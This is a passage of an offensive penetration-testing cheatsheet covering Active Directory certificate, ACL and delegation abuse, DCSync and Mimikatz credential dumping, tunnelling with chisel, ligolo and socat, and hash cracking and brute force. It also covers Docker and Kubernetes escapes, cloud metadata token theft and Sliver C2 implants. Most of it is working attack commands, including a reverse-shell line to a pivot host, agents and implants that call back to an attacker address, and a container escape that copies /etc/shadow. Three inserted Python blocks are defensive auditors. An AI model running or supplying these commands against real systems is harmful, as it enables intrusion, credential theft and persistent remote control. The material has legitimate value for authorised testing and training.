certipy req -target $CA_HOST -u 'machine$@domain.com' -p 'pass' \
  -dc-ip $IP -template Machine -ca CA-NAME

ESC15 — Application Policies Override EKU

bash
certipy req -u user@domain.com -p 'pass' \
  --application-policies "1.3.6.1.4.1.311.20.2.1" \
  -ca CA-NAME -template WebServer -dc-ip $IP

Authenticate with Certificate

bash
certipy auth -pfx administrator.pfx -dc-ip $IP
certipy auth -pfx administrator.pfx -dc-ip $IP -ldap-shell

Shadow Credentials

bash
# Requires: GenericWrite on target + Domain Functional Level >= 2016
 
# pyWhisker
python3 pywhisker.py -d domain.com -u attacker -p 'pass' --target victim --action add
# Outputs PFX file + password
 
# Authenticate with certificate
python3 gettgtpkinit.py -cert-pfx victim.pfx -pfx-pass <password> domain.com/victim victim.ccache
export KRB5CCNAME=victim.ccache
python3 getnthash.py -key <AS-REP-key> domain.com/victim
 
# Certipy (one-shot)
certipy shadow auto -u attacker@domain.com -p 'pass' -account victim -dc-ip $IP
 
# Cleanup
python3 pywhisker.py -d domain.com -u attacker -p 'pass' --target victim --action remove -D <DeviceID>

DCSync

bash
# Requires: DS-Replication-Get-Changes + DS-Replication-Get-Changes-All
secretsdump.py domain.com/user:pass@$IP
secretsdump.py -hashes :NTHASH domain.com/user@$IP
 
# Specific user
secretsdump.py domain.com/user:pass@$IP -just-dc-user administrator
 
# Mimikatz
lsadump::dcsync /domain:domain.com /user:administrator

ACL Abuse

Common Abusable ACEs

| Right | Abuse |
|---|---|
| GenericAll | Reset password, add to group, write SPN for kerberoast |
| GenericWrite | Write SPN, modify logon script, add shadow creds |
| WriteOwner | Take ownership → modify DACL |
| WriteDACL | Grant yourself GenericAll |
| ForceChangePassword | Reset target's password |
| AddMember | Add yourself to a group |
| ReadLAPSPassword | Read local admin password |

Exploitation

bash
# ForceChangePassword
net rpc password "target_user" "newpassword" -U "domain.com/user%pass" -S $IP
rpcclient -U "user%pass" $IP -c "setuserinfo2 target_user 23 'NewPass123!'"
 
# Add to group
net rpc group addmem "Domain Admins" "user" -U "domain.com/user%pass" -S $IP
 
# Set SPN for Kerberoasting
setspn -a MSSQLSvc/fake:1433 target_user  # from Windows
 
# Shadow Credentials
certipy shadow auto -u user@domain.com -p 'pass' -account 'target_user'

Delegation Attacks

Unconstrained Delegation

powershell
# Find
Get-ADComputer -Filter {TrustedForDelegation -eq $true}
# In BloodHound: MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
 
# Exploit: coerce auth + capture TGT
# Use Rubeus monitor + SpoolSample/PetitPotam/PrinterBug
Rubeus.exe monitor /interval:5 /nowrap
SpoolSample.exe dc.domain.com unconstrained-host.domain.com
Rubeus.exe ptt /ticket:<base64_ticket>

Constrained Delegation

bash
# Find
Get-ADUser -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
 
# Exploit with impacket
getST.py -spn 'cifs/target.domain.com' -impersonate administrator domain.com/svc_user:pass
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass target.domain.com

Resource-Based Constrained Delegation (RBCD)

bash
# Requires: GenericWrite/GenericAll on target computer
# Add machine account
addcomputer.py domain.com/user:pass -computer-name 'FAKE$' -computer-pass 'FakePass123!'
 
# Set msDS-AllowedToActOnBehalfOfOtherIdentity
rbcd.py -action write -delegate-from 'FAKE$' -delegate-to 'TARGET$' domain.com/user:pass
 
# Get service ticket
getST.py -spn 'cifs/target.domain.com' -impersonate administrator domain.com/'FAKE$':'FakePass123!'
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass target.domain.com
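An added example, not from the original cheatsheet: the checks behind the BloodHound queries listed earlier (AS-REP roastable, Kerberoastable, unconstrained delegation) and the three delegation sections above, written as one Python audit over a directory export so a defender can reproduce the findings from an LDAP dump of their own domain. The userAccountControl bit values are the documented ones; the account records are constructed.

```python
# userAccountControl bit masks (documented values of the AD attribute)
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000               # domain controllers
DONT_EXPIRE_PASSWORD = 0x10000
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
DONT_REQ_PREAUTH = 0x400000                 # Kerberos pre-auth disabled: AS-REP roastable
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

# Constructed directory export (a few attributes per object); not a real domain.
ACCOUNTS = [
    {"sAMAccountName": "krbtgt", "userAccountControl": NORMAL_ACCOUNT | ACCOUNTDISABLE,
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "svc_sql", "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"]},
    {"sAMAccountName": "jdoe", "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH},
    {"sAMAccountName": "olduser",
     "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH | ACCOUNTDISABLE},
    {"sAMAccountName": "svc_web",
     "userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/fs01.corp.local"]},
    {"sAMAccountName": "WEB01$",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "servicePrincipalName": ["HOST/web01.corp.local"]},
    {"sAMAccountName": "DC01$",
     "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "servicePrincipalName": ["HOST/dc01.corp.local"]},
    {"sAMAccountName": "FS01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": "<security descriptor bytes>"},
]


def audit_accounts(accounts):
    """Return the same classes of objects the BloodHound queries surface."""
    out = {"asrep_roastable": [], "kerberoastable": [], "unconstrained_delegation": [],
           "constrained_delegation": [], "rbcd_targets": []}
    for acct in accounts:
        name = acct["sAMAccountName"]
        uac = acct["userAccountControl"]
        disabled = bool(uac & ACCOUNTDISABLE)
        is_computer = bool(uac & (WORKSTATION_TRUST_ACCOUNT | SERVER_TRUST_ACCOUNT))
        is_dc = bool(uac & SERVER_TRUST_ACCOUNT)
        spns = acct.get("servicePrincipalName", [])

        # AS-REP roasting needs pre-auth disabled on an account that is still enabled.
        if uac & DONT_REQ_PREAUTH and not disabled:
            out["asrep_roastable"].append(name)
        # Kerberoasting targets user (not machine) accounts carrying an SPN; krbtgt is
        # skipped because its key is randomly generated and not crackable.
        if spns and not is_computer and not disabled and name.lower() != "krbtgt":
            out["kerberoastable"].append(name)
        # Unconstrained delegation is expected on DCs; anywhere else it is a finding.
        if uac & TRUSTED_FOR_DELEGATION and not is_dc:
            out["unconstrained_delegation"].append(name)
        # Constrained delegation: the tuple's second field is True when protocol
        # transition is enabled, i.e. the account may impersonate without the user's ticket.
        if acct.get("msDS-AllowedToDelegateTo"):
            out["constrained_delegation"].append(
                (name, bool(uac & TRUSTED_TO_AUTH_FOR_DELEGATION)))
        # RBCD: the attribute lives on the target; the principals it names can
        # impersonate users to that host, so review who wrote it.
        if acct.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
            out["rbcd_targets"].append(name)
    return out


if __name__ == "__main__":
    for category, names in audit_accounts(ACCOUNTS).items():
        print(f"{category}: {names}")
```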

Credential Dumping

bash
# Remote
secretsdump.py domain.com/admin:pass@$IP
secretsdump.py -hashes :NTHASH domain.com/admin@$IP
 
# Local (on target)
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam
mimikatz # lsadump::lsa /patch
mimikatz # lsadump::dcsync /domain:domain.com /all
 
# LAPS passwords
netexec ldap $IP -u user -p pass -M laps
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd | where {$_."ms-Mcs-AdmPwd" -ne $null}
 
# gMSA passwords
netexec ldap $IP -u user -p pass --gmsa

New Impacket Tools (v0.12+)

bash
# dacledit.py — Read/write/remove ACEs in DACLs
dacledit.py -action read -target 'CN=victim,DC=corp,DC=local' domain/user:pass
dacledit.py -action write -rights DCSync -principal attacker -target-dn 'DC=corp,DC=local' domain/user:pass
 
# owneredit.py — Abuse WriteOwner
owneredit.py -action write -new-owner attacker -target victim domain/user:pass
 
# GetLAPSPassword.py — Extract LAPS passwords
GetLAPSPassword.py -dc-ip $IP domain/user:pass
 
# describeTicket.py — Analyze Kerberos tickets
describeTicket.py ticket.ccache
 
# regsecrets.py — Extract LSA secrets via remote registry
regsecrets.py domain/user:pass@$IP

AD Attack Flow

  1. Enumerate — null sessions, RID cycling, kerbrute
  2. AS-REP Roast — no creds needed
  3. Password Spray — common passwords against user list
  4. Kerberoast — with first valid creds
  5. BloodHound — map ACL attack paths
  6. ADCS — check for vulnerable certificate templates (ESC1-ESC15)
  7. Shadow Credentials — if GenericWrite on targets
  8. ACL Abuse — follow BloodHound paths
  9. Delegation — unconstrained/constrained/RBCD
  10. DCSync — dump all domain hashes

8. Pivoting & Tunneling

Network Discovery from Pivot Host

bash
# Find live hosts
for i in $(seq 1 254); do (ping -c 1 172.16.1.$i | grep "bytes from" &); done
 
# ARP scan
arp -a
ip neigh
 
# Port scan without nmap
for port in 21 22 23 25 53 80 88 110 135 139 143 389 443 445 636 1433 3306 3389 5985 8080; do
    (echo >/dev/tcp/172.16.1.10/$port) 2>/dev/null && echo "Port $port open"
done
 
# With nmap through proxy
proxychains nmap -sT -Pn -p 21,22,80,88,135,139,389,443,445,1433,3306,3389,5985 172.16.1.0/24
 
# Discover subnets from routing table
ip route
route -n
cat /etc/network/interfaces
cat /etc/resolv.conf

SSH Tunneling

Local Port Forward

bash
# Access remote service through SSH host
# Syntax: ssh -L [local_addr:]local_port:remote_host:remote_port user@ssh_host
ssh -L 8080:172.16.1.10:80 user@$IP
 
# Access internal web server
ssh -L 80:internal.server:80 user@$IP
# Then browse: http://localhost:80
 
# Multiple forwards
ssh -L 8080:10.10.1.5:80 -L 3389:10.10.1.5:3389 user@$IP

Dynamic Port Forward (SOCKS Proxy)

bash
# Create SOCKS proxy
ssh -D 1080 user@$IP -N -f
 
# Use with proxychains
# Edit /etc/proxychains4.conf: socks5 127.0.0.1 1080
proxychains nmap -sT -Pn 172.16.1.0/24
proxychains curl http://172.16.1.10
proxychains evil-winrm -i 172.16.1.10 -u admin -p pass

Remote Port Forward

bash
# Expose attacker's port to target network
ssh -R 9001:localhost:9001 user@$IP
 
# Reverse SOCKS
ssh -R 1080 user@$IP

Chisel

Setup

bash
# Attacker (server)
./chisel server --reverse --port 9001
 
# Target (client) — reverse SOCKS proxy
./chisel client LHOST:9001 R:socks
 
# Target (client) — specific port forward
./chisel client LHOST:9001 R:8080:127.0.0.1:8080
./chisel client LHOST:9001 R:445:172.16.1.10:445

Double Pivot

bash
# First hop
# Attacker: chisel server --reverse --port 9001
# Pivot1: ./chisel client LHOST:9001 R:socks
 
# Second hop
# Pivot1: ./chisel server --reverse --port 9002
# Pivot2: ./chisel client Pivot1_IP:9002 R:socks
 
# Configure proxychains for double pivot
# /etc/proxychains4.conf:
# socks5 127.0.0.1 1080   (first hop)
# socks5 127.0.0.1 1081   (second hop)

Ligolo-ng

Setup

bash
# Attacker (proxy server)
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601
 
# Target (agent)
./agent -connect LHOST:11601 -ignore-cert

Usage

bash
# In ligolo console
session                         # List/select sessions
ifconfig                        # Show target interfaces
 
# Add route for target's internal network
sudo ip route add 172.16.1.0/24 dev ligolo
 
start                           # Start tunnel
 
# Now access internal hosts directly (no proxychains needed!)
nmap -sT -Pn 172.16.1.10
curl http://172.16.1.10
evil-winrm -i 172.16.1.10 -u admin -p pass
 
# Listener (catch reverse shell through tunnel)
listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp

Double Pivot with Ligolo

bash
# After first tunnel is running, upload agent to second pivot host
# On pivot2: ./agent -connect PIVOT1_INTERNAL_IP:11601 -ignore-cert
# Add listener on first agent: listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
# Select new session, add route for third subnet, start

socat

bash
# Port forward
socat TCP-LISTEN:8080,fork TCP:172.16.1.10:80
 
# Reverse shell relay
# Attacker: nc -lvnp 4444
# Pivot: socat TCP-LISTEN:4444,fork TCP:LHOST:4444
# Target: bash -i >& /dev/tcp/PIVOT_IP/4444 0>&1

Proxychains

bash
# Edit /etc/proxychains4.conf
# socks5 127.0.0.1 1080
 
# Use with tools
proxychains nmap -sT -Pn $INTERNAL_IP
proxychains curl http://$INTERNAL_IP
proxychains evil-winrm -i $INTERNAL_IP -u admin -p pass

NTLM Relay

bash
# Find hosts with SMB signing disabled (valid relay targets)
netexec smb 172.16.1.0/24 --gen-relay-list relay_targets.txt
 
# Relay to targets
ntlmrelayx.py -tf relay_targets.txt -smb2support
 
# Coerce authentication
# PetitPotam
python3 PetitPotam.py LHOST $DC_IP
# PrinterBug
python3 printerbug.py domain.com/user:pass@$DC_IP LHOST
 
# Relay to LDAP (for RBCD or shadow creds)
ntlmrelayx.py -t ldap://$DC_IP --delegate-access
ntlmrelayx.py -t ldap://$DC_IP --shadow-credentials

Responder (Credential Capture)

bash
# Listen for LLMNR/NBT-NS/mDNS
sudo responder -I eth0 -dwPv
 
# Captured hashes: /usr/share/responder/logs/
# Crack NetNTLMv2
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Pivoting Tips

  • Always check ip route and arp -a on every pivot host
  • Internal services (localhost-only) are goldmines — always check ss -tlnp
  • Try credentials from previous hosts on every new host (password reuse)
  • Upload a static nmap or use bash port scanner on pivot hosts
  • Ligolo-ng > Chisel for multi-pivot scenarios (no proxychains needed)
  • Document every subnet and host you discover

9. Password Cracking

Hash Identification

bash
# Tools
hashid 'HASH_STRING'
hash-identifier
hashcat --identify hash.txt

Common Hash Formats

| Hash | Example | Length |
|---|---|---|
| MD5 | 5d41402abc4b2a76b9719d911017c592 | 32 hex |
| SHA1 | aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d | 40 hex |
| SHA256 | 2cf24dba5fb0a30e26e83b2ac5b9e29e... | 64 hex |
| NTLM | a4f49c406510bdcab6824ee7c30fd852 | 32 hex |
| NetNTLMv2 | user::DOMAIN:challenge:response:blob | Variable |
| bcrypt | $2a$10$... or $2b$... | 60 chars |
| sha512crypt | $6$salt$hash | Starts with $6$ |
| sha256crypt | $5$salt$hash | Starts with $5$ |
| md5crypt | $1$salt$hash | Starts with $1$ |
| Kerberos TGS | $krb5tgs$23$*... | Starts with $krb5tgs$ |
| AS-REP | $krb5asrep$23$... | Starts with $krb5asrep$ |

Hashcat

Common Modes

| Mode | Type |
|---|---|
| 0 | MD5 |
| 100 | SHA1 |
| 1000 | NTLM |
| 1400 | SHA256 |
| 1700 | SHA512 |
| 1800 | sha512crypt ($6$) |
| 3200 | bcrypt ($2*$) |
| 5500 | NetNTLMv1 |
| 5600 | NetNTLMv2 |
| 13100 | Kerberoast (TGS-REP etype 23) |
| 18200 | AS-REP Roast |
| 19600 | Kerberos TGS-REP etype 17 (AES128) |
| 19700 | Kerberos TGS-REP etype 18 (AES256) |
| 22000 | WPA-PBKDF2-PMKID+EAPOL |
| 22911 | RSA/DSA/EC/OpenSSH private key |
| 16500 | JWT |
| 11600 | 7-Zip |
| 13400 | KeePass |
| 26610 | MetaMask Wallet |
| 29700 | KeePass 4 |
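An added example (not part of the original cheatsheet): a Python identifier that turns the shape rules from the hash-format table and the mode numbers from the hashcat table above into code, so a triage script can route a hash file to the right `-m` without guessing. Sample hashes are constructed (the MD5 and SHA1 values are the table's own); modes 500 (md5crypt) and 7400 (sha256crypt) are real hashcat modes the table above does not list.

```python
import re

HEX = r"[0-9a-fA-F]"

# (label, hashcat mode, pattern). Structured/prefixed formats are tested before raw
# hex digests. A bare 32-hex string is reported as both MD5 and NTLM: they cannot be
# told apart by shape, only by where the hash came from.
RULES = [
    ("NetNTLMv2", 5600, rf"^[^:]+::[^:]*:{HEX}{{16}}:{HEX}{{32}}:{HEX}+$"),
    ("NetNTLMv1", 5500, rf"^[^:]+::[^:]*:{HEX}{{48}}:{HEX}{{48}}:{HEX}{{16}}$"),
    ("Kerberoast (TGS-REP etype 23)", 13100, r"^\$krb5tgs\$23\$"),
    ("Kerberos TGS-REP etype 17 (AES128)", 19600, r"^\$krb5tgs\$17\$"),
    ("Kerberos TGS-REP etype 18 (AES256)", 19700, r"^\$krb5tgs\$18\$"),
    ("AS-REP Roast", 18200, r"^\$krb5asrep\$23\$"),
    ("bcrypt", 3200, r"^\$2[abxy]\$\d\d\$[./A-Za-z0-9]{53}$"),            # 7 + 53 = 60 chars
    ("sha512crypt", 1800, r"^\$6\$(rounds=\d+\$)?[^$]{1,16}\$[./A-Za-z0-9]{86}$"),
    ("sha256crypt", 7400, r"^\$5\$(rounds=\d+\$)?[^$]{1,16}\$[./A-Za-z0-9]{43}$"),
    ("md5crypt", 500, r"^\$1\$[^$]{1,8}\$[./A-Za-z0-9]{22}$"),
    ("SHA1", 100, rf"^{HEX}{{40}}$"),
    ("SHA256", 1400, rf"^{HEX}{{64}}$"),
    ("SHA512", 1700, rf"^{HEX}{{128}}$"),
    ("MD5", 0, rf"^{HEX}{{32}}$"),
    ("NTLM", 1000, rf"^{HEX}{{32}}$"),
]
COMPILED = [(label, mode, re.compile(pattern)) for label, mode, pattern in RULES]

# Constructed sample lines; the first two are the digests shown in the format table.
SAMPLE_HASHES = [
    "5d41402abc4b2a76b9719d911017c592",
    "aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d",
    "$6$saltsalt$" + "A" * 86,
    "$2b$12$" + "A" * 53,
    "$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$" + "ab" * 16 + "$" + "cd" * 32,
    "$krb5asrep$23$jdoe@CORP.LOCAL:" + "ab" * 16 + "$" + "cd" * 32,
    "jdoe::CORP:1122334455667788:" + "ab" * 16 + ":0101000000000000" + "cd" * 20,
]


def identify_hash(value):
    """Return [(label, hashcat mode), ...] for one hash string; [] if nothing matches."""
    value = value.strip()
    return [(label, mode) for label, mode, rx in COMPILED if rx.match(value)]


def triage(lines):
    """Group hash-file lines by the first candidate's mode so each group can be run
    with its own -m. Unrecognised lines land under None for manual review."""
    groups = {}
    for line in lines:
        if not line.strip():
            continue
        candidates = identify_hash(line)
        key = candidates[0][1] if candidates else None
        groups.setdefault(key, []).append(line.strip())
    return groups


if __name__ == "__main__":
    for mode, hashes in triage(SAMPLE_HASHES).items():
        print(f"-m {mode}: {len(hashes)} hash(es)")
```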

Basic Usage

bash
# Auto-detect hash type (hashcat 7.0+)
hashcat --identify hash.txt
hashcat hash.txt /usr/share/wordlists/rockyou.txt    # Auto-detect mode
 
# Dictionary attack
hashcat -m MODE hash.txt /usr/share/wordlists/rockyou.txt
 
# With rules
hashcat -m MODE hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
 
# Show cracked
hashcat -m MODE hash.txt --show
 
# Brute force
hashcat -m MODE hash.txt -a 3 ?a?a?a?a?a?a?a?a
 
# Hybrid (wordlist + mask)
hashcat -m MODE hash.txt -a 6 /usr/share/wordlists/rockyou.txt ?d?d?d
hashcat -m MODE hash.txt -a 7 ?d?d?d /usr/share/wordlists/rockyou.txt

Mask Charsets

| Charset | Description |
|---|---|
| ?l | Lowercase (a-z) |
| ?u | Uppercase (A-Z) |
| ?d | Digits (0-9) |
| ?s | Special chars |
| ?a | All printable |
| ?b | Binary (0x00-0xff) |

John the Ripper

bash
# Auto-detect hash type
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
 
# Specific format
john hash.txt --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt
john hash.txt --format=raw-sha1 --wordlist=/usr/share/wordlists/rockyou.txt
john hash.txt --format=nt --wordlist=/usr/share/wordlists/rockyou.txt
john hash.txt --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt
 
# Show cracked
john hash.txt --show
 
# With rules
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --rules=best64

Hash Extraction Tools

bash
# SSH keys
ssh2john id_rsa > id_rsa.hash
 
# ZIP files
zip2john file.zip > zip.hash
 
# RAR files
rar2john file.rar > rar.hash
 
# KeePass
keepass2john database.kdbx > keepass.hash
 
# 7-Zip
7z2john file.7z > 7z.hash
 
# PDF
pdf2john file.pdf > pdf.hash
 
# Office docs
office2john file.docx > office.hash
 
# /etc/shadow
unshadow /etc/passwd /etc/shadow > unshadowed.txt

Wordlists

Standard

plaintext
/usr/share/wordlists/rockyou.txt
/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
/usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt

Username Lists

plaintext
/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
/usr/share/seclists/Usernames/Names/names.txt
/usr/share/seclists/Usernames/cirt-default-usernames.txt

Custom Wordlist Generation

bash
# CeWL — scrape words from website
cewl http://$IP -d 3 -m 5 -w cewl.txt
 
# Username generation from names
username-anarchy -i names.txt > usernames.txt
 
# Crunch — pattern-based
crunch 8 8 -t Pass%%^^ -o custom.txt    # Pass + 2 digits + 2 specials
 
# Mutate with hashcat rules
hashcat --stdout wordlist.txt -r /usr/share/hashcat/rules/best64.rule > mutated.txt

Online Brute Force

Hydra

bash
# SSH
hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://$IP
 
# FTP
hydra -l user -P /usr/share/wordlists/rockyou.txt ftp://$IP
 
# HTTP POST login
hydra -l admin -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
 
# HTTP Basic Auth
hydra -l admin -P /usr/share/wordlists/rockyou.txt $IP http-get /admin
 
# RDP
hydra -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$IP
 
# SMB
hydra -l administrator -P /usr/share/wordlists/rockyou.txt smb://$IP
 
# MySQL
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://$IP

NetExec

bash
# SMB password spray
netexec smb $IP -u users.txt -p 'Password1' --continue-on-success
 
# Multiple passwords (no brute, one pass per user)
netexec smb $IP -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
 
# WinRM
netexec winrm $IP -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

Default Credentials

Always try these first:

| Service | Username | Password |
|---|---|---|
| SSH | root, admin | root, admin, toor |
| MySQL | root | (empty), root, mysql |
| PostgreSQL | postgres | postgres |
| MSSQL | sa | (empty), sa |
| MongoDB | (none) | (none — no auth) |
| Tomcat | tomcat, admin | tomcat, admin, s3cret |
| Jenkins | admin | admin |
| WordPress | admin | admin |
| phpMyAdmin | root | (empty) |
| Redis | (none) | (none — no auth) |
| Elasticsearch | (none) | (none — no auth) |

10. Cloud & Container Attacks

Docker Escape

bash
# Detect container
cat /proc/1/cgroup 2>/dev/null | grep -i docker
ls -la /.dockerenv
hostname    # random hex = likely container
 
# Docker socket escape (most common)
ls -la /var/run/docker.sock
docker -H unix:///var/run/docker.sock run -v /:/hostfs -it alpine chroot /hostfs bash
 
# Privileged container — cgroup release_agent
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd && echo "cat /etc/shadow > $host_path/output" >> /cmd
chmod a+x /cmd && sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
 
# SYS_ADMIN capability escape
capsh --print | grep sys_admin
mount -t overlay overlay -o lowerdir=/,upperdir=/tmp/upper,workdir=/tmp/work /mnt
 
# Privileged + host PID namespace
nsenter --target 1 --mount --uts --ipc --net --pid -- bash
 
# Docker socket via TCP
docker -H tcp://172.17.0.1:2375 run -v /:/hostfs -it alpine chroot /hostfs bash

Kubernetes

bash
# Detect pod
ls /var/run/secrets/kubernetes.io/serviceaccount/
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://kubernetes.default.svc
 
# Enumerate permissions
kubectl auth can-i --list
curl -sk $APISERVER/api/v1/namespaces --header "Authorization: Bearer $TOKEN"
 
# List pods & secrets
kubectl get pods --all-namespaces
kubectl get secrets --all-namespaces -o yaml
 
# Create privileged pod (if allowed)
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: evil-pod
spec:
  containers:
  - name: pwn
    image: alpine
    command: ["/bin/sh", "-c", "sleep 999999"]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
      type: Directory
  hostNetwork: true
  hostPID: true
EOF
kubectl exec -it evil-pod -- chroot /host bash
 
# Kubelet API (port 10250)
curl -sk https://$NODE_IP:10250/pods
curl -sk https://$NODE_IP:10250/run/<namespace>/<pod>/<container> -d "cmd=id"
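An added example (not from the original cheatsheet): a Python check that flags the settings the privileged-pod manifest above relies on (privileged mode, hostPID/hostNetwork, a hostPath of `/`) plus the SYS_ADMIN-style capabilities from the Docker section, the way an admission policy or a CI manifest linter would. The manifest is embedded as a Python dict mirroring the YAML above so it runs offline without a YAML library; the hardened counterpart is constructed.

```python
# The manifest from the block above, as a Python dict (no YAML parser needed).
EVIL_POD = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "evil-pod"},
    "spec": {
        "containers": [{
            "name": "pwn",
            "image": "alpine",
            "command": ["/bin/sh", "-c", "sleep 999999"],
            "securityContext": {"privileged": True},
            "volumeMounts": [{"mountPath": "/host", "name": "hostfs"}],
        }],
        "volumes": [{"name": "hostfs", "hostPath": {"path": "/", "type": "Directory"}}],
        "hostNetwork": True,
        "hostPID": True,
    },
}

# A constructed hardened pod for comparison: non-root, no privilege escalation,
# all capabilities dropped, only an emptyDir volume.
SAFE_POD = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "web"},
    "spec": {
        "containers": [{
            "name": "web",
            "image": "nginx",
            "securityContext": {"runAsNonRoot": True, "allowPrivilegeEscalation": False,
                                "capabilities": {"drop": ["ALL"]}},
            "volumeMounts": [{"mountPath": "/cache", "name": "cache"}],
        }],
        "volumes": [{"name": "cache", "emptyDir": {}}],
    },
}

# hostPath roots that hand over the node: "/" and the Docker socket are the ones the
# escape commands on this page use; the rest are the usual sensitive node locations.
SENSITIVE_HOST_PATHS = ("/", "/var/run/docker.sock", "/run/docker.sock", "/etc", "/proc",
                        "/var/lib/kubelet", "/root")
DANGEROUS_CAPS = ("ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "NET_ADMIN", "DAC_READ_SEARCH")


def is_sensitive_host_path(path):
    if path == "/":
        return True
    return any(path == p or path.startswith(p + "/") for p in SENSITIVE_HOST_PATHS if p != "/")


def pod_escape_risks(pod):
    """Flag settings that make a container escape trivial: host namespaces,
    privileged mode, dangerous added capabilities and sensitive hostPath mounts."""
    spec = pod.get("spec", {})
    findings = []
    for key in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(key):
            findings.append(f"spec.{key}=true")
    host_paths = {v["name"]: v["hostPath"]["path"]
                  for v in spec.get("volumes", []) if "hostPath" in v}
    for c in spec.get("initContainers", []) + spec.get("containers", []):
        sc = c.get("securityContext", {})
        if sc.get("privileged"):
            findings.append(f"container {c['name']}: privileged=true")
        for cap in sc.get("capabilities", {}).get("add", []):
            norm = cap.upper()
            norm = norm[4:] if norm.startswith("CAP_") else norm
            if norm in DANGEROUS_CAPS:
                findings.append(f"container {c['name']}: adds capability {cap}")
        for mount in c.get("volumeMounts", []):
            path = host_paths.get(mount["name"])
            if path is not None and is_sensitive_host_path(path):
                findings.append(
                    f"container {c['name']}: hostPath {path} mounted at {mount['mountPath']}")
    return findings


if __name__ == "__main__":
    for pod in (EVIL_POD, SAFE_POD):
        print(pod["metadata"]["name"], pod_escape_risks(pod) or "no escape risks")
```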

Cloud Metadata Endpoints

bash
# AWS IMDSv1
curl -s http://169.254.169.254/latest/meta-data/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE>
curl -s http://169.254.169.254/latest/user-data
 
# AWS IMDSv2 (token required)
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
 
# GCP
curl -s -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
curl -s -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/project/attributes/
 
# Azure
curl -s -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
curl -s -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
 
# DigitalOcean
curl -s http://169.254.169.254/metadata/v1/

11. Modern C2 Frameworks

Sliver

bash
# Install
curl https://sliver.sh/install | sudo bash
sliver-server
 
# Generate implants
generate --mtls LHOST:8888 --os windows --arch amd64 --format exe --save /tmp/implant.exe
generate --mtls LHOST:8888 --os linux --arch amd64 --format elf --save /tmp/implant
generate --http LHOST:443 --os windows --skip-symbols --save /tmp/implant.exe
 
# Start listeners
mtls --lhost 0.0.0.0 --lport 8888
